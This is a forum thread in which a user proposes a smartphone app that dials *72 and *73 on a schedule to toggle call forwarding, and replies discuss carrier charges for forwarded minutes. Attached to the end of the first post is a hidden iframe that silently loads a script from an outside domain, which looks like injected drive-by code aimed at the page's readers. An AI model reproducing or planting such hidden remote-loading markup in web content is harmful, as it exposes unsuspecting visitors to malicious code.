+ Reply to Thread

Timed-Dial Software Idea

Ok for my 200th post I wanted to submit an idea for some software for a smartphone --

I'm hoping rlwhitt or someone will run with this idea - If it exists, somebody please let me know.

What im thinking is a timed dialer, something that would call a number or addressbook entry at a schedule time-- or link the dialer to the calender somehow to call a number typed in a calendar entry.

The goal would be to make a smartphone smarter by: having it calling the *72 call forward number automatically at the time when your "unlimited evening minutes" switch in the morning and then shut off call forwarding by calling *73 after work or at the time when the "unlimited" minutes start again.

Another bonus would be to set a wake up call-- having your house phones ring would/could be louder than the alerts/ringers of the phone itself-- an timed dial could call you at home to wake you up or get you out of those boring meetings just in time

So anybody have any thoughts? Ideas?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    iPhone therefore iAm.

Re: Timed-Dial Software Idea

Originally posted by Steve

The goal would be to make a smartphone smarter by: having it calling the *72 call forward number automatically at the time when your "unlimited evening minutes" switch in the morning and then shut off call forwarding by calling *73 after work or at the time when the "unlimited" minutes start again.
    Neat idea, however when the fone is forwarded, aren't the minutes still used when the call is answered at the number to which the fone is forwarded.

hmm good point -- Isn't that only on the new plans? I have never seen those charges...maybe I should look closer. Still be nice If you want your calls routed so you only have one number and especially if you dont get any signal inside your office!
    iPhone therefore iAm.

I do the same thing at home (without the automation, naturally).

My signal @ home sucks, so I forward to my home phone when I'm here.... Verizon hasn't charged me for the minutes used, although they are shown on the bill.

I'd really like something of this nature.

-LK

the calls while your fone is forwarded should be listed on you bill as incoming call, and no number other than your handset (the bill presents number called only.)

if V is no longer burning mins while the fone is forwarded, cool.

Was surprised Verizon charges for forwarded minutes

I installed a nice little app called FastForward on my Treo 600 based on past experience that forwarded minutes weren't charged. Luckily I have a lot of minutes on my Verizon plan and wasn't using the phone much the month I started forwarding while in my office. My bill was over my plan by about $30 dollars due to 800 minutes of forwarding. So much for that idea. Is there a carrier that doesn't charge for forwarding?

Well I know on the Blackberry 7100t you can have the phone "turn off" and "turn on" during specific times for the weekends and weekdays.

you can also setup what happends when your line is either busy, unavailable, or no answer.

So if you combine the two features....tum tum tum...

perhaps there's something like that in the treo650....mine is coming on Monday 14 Feb so I'll be able to explore in detail then.